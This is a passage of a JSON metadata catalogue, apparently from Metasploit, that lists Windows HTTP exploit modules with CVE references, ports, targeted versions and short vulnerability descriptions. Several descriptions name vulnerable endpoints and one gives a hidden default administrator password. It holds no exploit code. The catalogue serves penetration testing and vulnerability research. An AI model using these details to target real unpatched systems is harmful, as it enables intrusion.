],
"description": "This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\n for OS Deployment version 5.1.0.X.",
"references": [
"CVE-2007-1868",
"OSVDB-34678",
"BID-23264",
"URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"
],
"platform": "Windows",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"TPMfOSD 5.1 (Windows 2000 SP4 - English)",
"TPMfOSD 5.1 (Windows 2003 All - English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/ibm_tpmfosd_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ibm_tsm_cad_header": {
"name": "IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",
"full_name": "exploit/windows/http/ibm_tsm_cad_header",
"rank": 400,
"disclosure_date": "2007-09-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).\n By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.",
"references": [
"CVE-2007-4880",
"OSVDB-38161",
"BID-25743"
],
"platform": "Windows",
"arch": "",
"rport": 1581,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM Tivoli Storage Manager Express 5.3.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ibm_tsm_cad_header.rb",
"is_install_path": true,
"ref_name": "windows/http/ibm_tsm_cad_header",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/icecast_header": {
"name": "Icecast Header Overwrite",
"full_name": "exploit/windows/http/icecast_header",
"rank": 500,
"disclosure_date": "2004-09-28",
"type": "exploit",
"author": [
"spoonm <spoonm@no$email.com>",
"Luigi Auriemma <aluigi@autistici.org>"
],
"description": "This module exploits a buffer overflow in the header parsing of icecast\n versions 2.0.1 and earlier, discovered by Luigi Auriemma. Sending 32\n HTTP headers will cause a write one past the end of a pointer array. On\n win32 this happens to overwrite the saved instruction pointer, and on\n linux (depending on compiler, etc) this seems to generally overwrite\n nothing crucial (read not exploitable).\n\n This exploit uses ExitThread(), this will leave icecast thinking the\n thread is still in use, and the thread counter won't be decremented.\n This means for each time your payload exits, the counter will be left\n incremented, and eventually the threadpool limit will be maxed. So you\n can multihit, but only till you fill the threadpool.",
"references": [
"CVE-2004-1561",
"OSVDB-10406",
"BID-11271",
"URL-http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html"
],
"platform": "Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/icecast_header.rb",
"is_install_path": true,
"ref_name": "windows/http/icecast_header",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/integard_password_bof": {
"name": "Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow",
"full_name": "exploit/windows/http/integard_password_bof",
"rank": 500,
"disclosure_date": "2010-09-07",
"type": "exploit",
"author": [
"Lincoln",
"Nullthreat",
"rick2600",
"corelanc0d3r <peter.ve@corelan.be>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Race River's Integard Home/Pro\n internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are\n vulnerable.\n\n The administration web page on port 18881 is vulnerable to a remote buffer overflow\n attack. By sending a long character string in the password field, both the structured\n exception handler and the saved extended instruction pointer are overwritten, allowing\n an attacker to gain control of the application and the underlying operating system\n remotely.\n\n The administration website service runs with SYSTEM privileges, and automatically\n restarts when it crashes.",
"references": [
"OSVDB-67909",
"URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061"
],
"platform": "Windows",
"arch": "",
"rport": 18881,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"Integard Home 2.0.0.9021",
"Integard Pro 2.2.0.9026"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/integard_password_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/integard_password_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/intersystems_cache": {
"name": "InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow",
"full_name": "exploit/windows/http/intersystems_cache",
"rank": 500,
"disclosure_date": "2009-09-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in InterSystems Cache 2009.1.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.",
"references": [
"OSVDB-60549",
"BID-37177"
],
"platform": "Windows",
"arch": "",
"rport": 57772,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/intersystems_cache.rb",
"is_install_path": true,
"ref_name": "windows/http/intersystems_cache",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/intrasrv_bof": {
"name": "Intrasrv 1.0 Buffer Overflow",
"full_name": "exploit/windows/http/intrasrv_bof",
"rank": 0,
"disclosure_date": "2013-05-30",
"type": "exploit",
"author": [
"xis_one",
"PsychoSpy <neinwechter@gmail.com>"
],
"description": "This module exploits a boundary condition error in Intrasrv Simple Web\n Server 1.0. The web interface does not validate the boundaries of an\n HTTP request string prior to copying the data to an insufficiently sized\n buffer. Successful exploitation leads to arbitrary remote code execution\n in the context of the application.",
"references": [
"OSVDB-94097",
"EDB-18397",
"BID-60229"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"v1.0 - XP / Win7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/intrasrv_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/intrasrv_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ipswitch_wug_maincfgret": {
"name": "Ipswitch WhatsUp Gold 8.03 Buffer Overflow",
"full_name": "exploit/windows/http/ipswitch_wug_maincfgret",
"rank": 500,
"disclosure_date": "2004-08-25",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By\n posting a long string for the value of 'instancename' in the _maincfgret.cgi\n script an attacker can overflow a buffer and execute arbitrary code on the system.",
"references": [
"CVE-2004-0798",
"OSVDB-9177",
"BID-11043"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WhatsUP Gold 8.03 Universal"
],
"mod_time": "2018-08-20 18:08:19 +0000",
"path": "/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb",
"is_install_path": true,
"ref_name": "windows/http/ipswitch_wug_maincfgret",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/http/jira_collector_traversal": {
"name": "JIRA Issues Collector Directory Traversal",
"full_name": "exploit/windows/http/jira_collector_traversal",
"rank": 300,
"disclosure_date": "2014-02-26",
"type": "exploit",
"author": [
"Philippe Arteau",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal flaw in JIRA 6.0.3. The vulnerability exists\n in the issues collector code, while handling attachments provided by the user. It can be\n exploited in Windows environments to get remote code execution. This module has been tested\n successfully on JIRA 6.0.3 with Windows 2003 SP2 Server.",
"references": [
"CVE-2014-2314",
"OSVDB-103807",
"BID-65849",
"URL-https://confluence.atlassian.com/display/JIRA/JIRA+Security+Advisory+2014-02-26",
"URL-http://blog.h3xstream.com/2014/02/jira-path-traversal-explained.html"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Jira 6.0.3 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/jira_collector_traversal.rb",
"is_install_path": true,
"ref_name": "windows/http/jira_collector_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/kaseya_uploader": {
"name": "Kaseya VSA uploader.aspx Arbitrary File Upload",
"full_name": "exploit/windows/http/kaseya_uploader",
"rank": 600,
"disclosure_date": "2015-09-23",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions\n between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary\n directory leading to arbitrary code execution with IUSR privileges. This module has been\n tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.",
"references": [
"CVE-2015-6922",
"ZDI-15-449",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt",
"URL-https://seclists.org/bugtraq/2015/Sep/132"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Kaseya VSA v7 to v9.1"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/kaseya_uploader.rb",
"is_install_path": true,
"ref_name": "windows/http/kaseya_uploader",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/kaseya_uploadimage_file_upload": {
"name": "Kaseya uploadImage Arbitrary File Upload",
"full_name": "exploit/windows/http/kaseya_uploadimage_file_upload",
"rank": 600,
"disclosure_date": "2013-11-11",
"type": "exploit",
"author": [
"Thomas Hibbert <thomas.hibbert@security-assessment.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability found in Kaseya versions below\n 6.3.0.2. A malicious user can upload an ASP file to an arbitrary directory without previous\n authentication, leading to arbitrary code execution with IUSR privileges.",
"references": [
"OSVDB-99984",
"BID-63782",
"EDB-29675",
"URL-http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Kaseya KServer / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/kaseya_uploadimage_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/kolibri_http": {
"name": "Kolibri HTTP Server HEAD Buffer Overflow",
"full_name": "exploit/windows/http/kolibri_http",
"rank": 400,
"disclosure_date": "2010-12-26",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"TheLeader",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.",
"references": [
"CVE-2002-2268",
"OSVDB-70808",
"BID-6289",
"EDB-15834"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP sp3",
"Windows Server 2003 sp2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/kolibri_http.rb",
"is_install_path": true,
"ref_name": "windows/http/kolibri_http",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/landesk_thinkmanagement_upload_asp": {
"name": "LANDesk Lenovo ThinkManagement Console Remote Command Execution",
"full_name": "exploit/windows/http/landesk_thinkmanagement_upload_asp",
"rank": 600,
"disclosure_date": "2012-02-15",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module can be used to execute a payload on LANDesk Lenovo\n ThinkManagement Suite 9.0.2 and 9.0.3.\n\n The payload is uploaded as an ASP script by sending a specially crafted\n SOAP request to \"/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx\",\n via a \"RunAMTCommand\" operation with the command '-PutUpdateFileCore'\n as the argument.\n\n After execution, the ASP script with the payload is deleted by sending\n another specially crafted SOAP request to \"WSVulnerabilityCore/VulCore.asmx\"\n via a \"SetTaskLogByFile\" operation.",
"references": [
"CVE-2012-1195",
"CVE-2012-1196",
"OSVDB-79276",
"OSVDB-79277",
"BID-52023",
"EDB-18622",
"EDB-18623"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb",
"is_install_path": true,
"ref_name": "windows/http/landesk_thinkmanagement_upload_asp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/lexmark_markvision_gfd_upload": {
"name": "Lexmark MarkVision Enterprise Arbitrary File Upload",
"full_name": "exploit/windows/http/lexmark_markvision_gfd_upload",
"rank": 600,
"disclosure_date": "2014-12-09",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1.\n A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated\n attacker to upload arbitrary files, including arbitrary JSP code. This module has been\n tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.",
"references": [
"CVE-2014-8741",
"ZDI-14-410",
"URL-http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US"
],
"platform": "Windows",
"arch": "java",
"rport": 9788,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Lexmark Markvision Enterprise 2.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/lexmark_markvision_gfd_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/mailenable_auth_header": {
"name": "MailEnable Authorization Header Buffer Overflow",
"full_name": "exploit/windows/http/mailenable_auth_header",
"rank": 500,
"disclosure_date": "2005-04-24",
"type": "exploit",
"author": [
"David Maciejak <david.maciejak@kyxar.fr>"
],
"description": "This module exploits a remote buffer overflow in the MailEnable web service.\n The vulnerability is triggered when a large value is placed into the Authorization\n header of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and\n MailEnable Professional versions prior to 1.55 are affected.",
"references": [
"CVE-2005-1348",
"OSVDB-15913",
"OSVDB-15737",
"BID-13350",
"URL-http://www.nessus.org/plugins/index.php?view=single&id=18123"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MEHTTPS.exe Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/mailenable_auth_header.rb",
"is_install_path": true,
"ref_name": "windows/http/mailenable_auth_header",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/manage_engine_opmanager_rce": {
"name": "ManageEngine OpManager Remote Code Execution",
"full_name": "exploit/windows/http/manage_engine_opmanager_rce",
"rank": 0,
"disclosure_date": "2015-09-14",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a default credential vulnerability in ManageEngine OpManager, where a\n default hidden account \"IntegrationUser\" with administrator privileges exists. The account\n has a default password of \"plugin\" which cannot be reset through the user interface. By\n logging in and abusing the default administrator's SQL query functionality, it's possible to\n write a WAR payload to disk and trigger an automatic deployment of this payload. This\n module has been tested successfully on OpManager v11.0 and v11.4-v11.6 for Windows.",
"references": [
"EDB-38174",
"CVE-2015-7765",
"CVE-2015-7766",
"URL-https://seclists.org/fulldisclosure/2015/Sep/66",
"URL-https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability"
],
"platform": "Java",
"arch": "java",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ManageEngine OpManager <= v11.6"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/manage_engine_opmanager_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/manage_engine_opmanager_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/manageengine_adshacluster_rce": {
"name": "Manage Engine Exchange Reporter Plus Unauthenticated RCE",
"full_name": "exploit/windows/http/manageengine_adshacluster_rce",
"rank": 600,
"disclosure_date": "2018-06-28",
"type": "exploit",
"author": [
"Kacper Szurek <kacperszurek@gmail.com>"
],
"description": "This module exploits a remote code execution vulnerability that\n exists in Exchange Reporter Plus <= 5310, caused by execution of\n the bcp.exe file inside the ADSHACluster servlet.",
"references": [
"URL-https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 8181,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-07-12 14:27:28 +0000",
"path": "/modules/exploits/windows/http/manageengine_adshacluster_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/manageengine_adshacluster_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/manageengine_appmanager_exec": {
"name": "ManageEngine Applications Manager Remote Code Execution",
"full_name": "exploit/windows/http/manageengine_appmanager_exec",
"rank": 600,
"disclosure_date": "2018-03-07",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a command injection vulnerability in the ManageEngine Application Manager product.\n An unauthenticated user can execute an operating system command under the context of a privileged user.\n\n The publicly accessible testCredential.do endpoint takes multiple user inputs and validates the supplied credentials\n by accessing the given system. This endpoint calls several internal classes and then executes a powershell script\n without validating the user-supplied parameter when the given system is OfficeSharePointServer.",
"references": [
"CVE-2018-7890",
"BID-103358",
"URL-https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/",
"URL-https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-03-19 23:27:18 +0000",
"path": "/modules/exploits/windows/http/manageengine_appmanager_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/manageengine_appmanager_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/manageengine_apps_mngr": {
"name": "ManageEngine Applications Manager Authenticated Code Execution",
"full_name": "exploit/windows/http/manageengine_apps_mngr",
"rank": 200,
"disclosure_date": "2011-04-08",
"type": "exploit",
"author": [
"Jacob Giannantonio <JGiannan@gmail.com>"
],
"description": "This module logs into the Manage Engine Applications Manager to upload a\n payload to the file system and a batch script that executes the payload.",
"references": [
"EDB-17152"
],
"platform": "Windows",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-20 18:08:19 +0000",
"path": "/modules/exploits/windows/http/manageengine_apps_mngr.rb",
"is_install_path": true,
"ref_name": "windows/http/manageengine_apps_mngr",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/http/manageengine_connectionid_write": {
"name": "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",
"full_name": "exploit/windows/http/manageengine_connectionid_write",
"rank": 600,
"disclosure_date": "2015-12-14",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in ManageEngine Desktop Central 9. When\n uploading a 7z file, the FileUploadServlet class does not check the user-controlled\n ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to\n inject a null byte at the end of the value to create a malicious file with an arbitrary\n file type, and then place it under a directory that allows server-side scripts to run,\n which results in remote code execution under the context of SYSTEM.\n\n Please note that by default, some ManageEngine Desktop Central versions run on port 8020,\n but older ones run on port 8040. Also, using this exploit will leave debugging information\n produced by FileUploadServlet in file rdslog0.txt.\n\n This exploit was successfully tested on version 9, build 90109 and build 91084.",
"references": [
"URL-https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249",
"CVE-2015-8249"
],
"platform": "Windows",
"arch": "",
"rport": 8020,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ManageEngine Desktop Central 9 on Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/manageengine_connectionid_write.rb",
"is_install_path": true,
"ref_name": "windows/http/manageengine_connectionid_write",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/maxdb_webdbm_database": {
"name": "MaxDB WebDBM Database Parameter Overflow",
"full_name": "exploit/windows/http/maxdb_webdbm_database",
"rank": 400,
"disclosure_date": "2006-08-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the MaxDB WebDBM\n service. By sending a specially-crafted HTTP request that contains\n an overly long database name, a remote attacker could overflow a buffer\n and execute arbitrary code on the system with privileges of the wahttp process.\n\n This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.",
"references": [
"CVE-2006-4305",
"OSVDB-28300",
"BID-19660"
],
"platform": "Windows",
"arch": "",
"rport": 9999,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MaxDB 7.6.00.16",
"MaxDB 7.6.00.27"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/maxdb_webdbm_database.rb",
"is_install_path": true,
"ref_name": "windows/http/maxdb_webdbm_database",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/maxdb_webdbm_get_overflow": {
"name": "MaxDB WebDBM GET Buffer Overflow",
"full_name": "exploit/windows/http/maxdb_webdbm_get_overflow",
"rank": 400,
"disclosure_date": "2005-04-26",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the MaxDB WebDBM\n service. This service is included with many recent versions\n of the MaxDB and SAPDB products. This particular module is\n capable of exploiting Windows systems through the use of an\n SEH frame overwrite. The offset to the SEH frame may change\n depending on where MaxDB has been installed, this module\n assumes a web root path with the same length as:\n\n C:\\Program Files\\sdb\\programs\\web\\Documents",
"references": [
"CVE-2005-0684",
"OSVDB-15816",
"URL-http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities",
"BID-13368"
],
"platform": "Windows",
"arch": "",
"rport": 9999,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MaxDB 7.5.00.11 / 7.5.00.24",
"Windows 2000 English",
"Windows XP English SP0/SP1",
"Windows 2003 English",
"Windows NT 4.0 SP4/SP5/SP6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/maxdb_webdbm_get_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/mcafee_epolicy_source": {
"name": "McAfee ePolicy Orchestrator / ProtectionPilot Overflow",
"full_name": "exploit/windows/http/mcafee_epolicy_source",
"rank": 200,
"disclosure_date": "2006-07-17",
"type": "exploit",
"author": [
"muts <muts@remote-exploit.org>",
"xbxice <xbxice@yahoo.com>",
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This is an exploit for the McAfee HTTP Server (NAISERV.exe).\n McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are\n known to be vulnerable. By sending a large 'Source' header, the stack can\n be overwritten. This module is based on the exploit by xbxice and muts.\n Due to size constraints, this module uses the Egghunter technique.",
"references": [
"CVE-2006-5156",
"OSVDB-29421",
"EDB-2467",
"BID-20288"
],
"platform": "Windows",
"arch": "x86",
"rport": 81,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"ePo 2.5.1 (Service Pack 1)",
"ePo 3.5.0/ProtectionPilot 1.1.0"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/mcafee_epolicy_source.rb",
"is_install_path": true,
"ref_name": "windows/http/mcafee_epolicy_source",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/mdaemon_worldclient_form2raw": {
"name": "MDaemon WorldClient form2raw.cgi Stack Buffer Overflow",
"full_name": "exploit/windows/http/mdaemon_worldclient_form2raw",
"rank": 500,
"disclosure_date": "2003-12-29",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for\n versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),\n a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,\n by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),\n the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based\n overflow occurs when an excessively long From field is specified.\n The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.\n Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.\n\n Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very\n reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will\n continue to crash/execute the payload until the CGI output is manually deleted\n from the queue in C:\\MDaemon\\RawFiles\\*.raw.",
"references": [
"CVE-2003-1200",
"OSVDB-3255",
"BID-9317"
],
"platform": "Windows",
"arch": "x86",
"rport": 3000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal MDaemon.exe",
"Debugging test"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb",
"is_install_path": true,
"ref_name": "windows/http/mdaemon_worldclient_form2raw",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/minishare_get_overflow": {
"name": "Minishare 1.4.1 Buffer Overflow",
"full_name": "exploit/windows/http/minishare_get_overflow",
"rank": 200,
"disclosure_date": "2004-11-07",
"type": "exploit",
"author": [
"acaro <acaro@jervus.it>"
],
"description": "This is a simple buffer overflow for the minishare web\n server. This flaw affects all versions prior to 1.4.2. This\n is a plain stack buffer overflow that requires a \"jmp esp\" to reach\n the payload, making this difficult to target many platforms\n at once. This module has been successfully tested against\n 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.",
"references": [
"CVE-2004-2271",
"OSVDB-11530",
"BID-11620",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows 2000 SP0-SP3 English",
"Windows 2000 SP4 English",
"Windows XP SP0-SP1 English",
"Windows XP SP2 English",
"Windows 2003 SP0 English",
"Windows 2003 SP1 English",
"Windows 2003 SP2 English",
"Windows NT 4.0 SP6",
"Windows XP SP2 German",
"Windows XP SP2 Polish",
"Windows XP SP2 French",
"Windows XP SP3 French"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/minishare_get_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/minishare_get_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/miniweb_upload_wbem": {
"name": "MiniWeb (Build 300) Arbitrary File Upload",
"full_name": "exploit/windows/http/miniweb_upload_wbem",
"rank": 600,
"disclosure_date": "2013-04-09",
"type": "exploit",
"author": [
"AkaStep",
"bcoles <bcoles@gmail.com>"
],
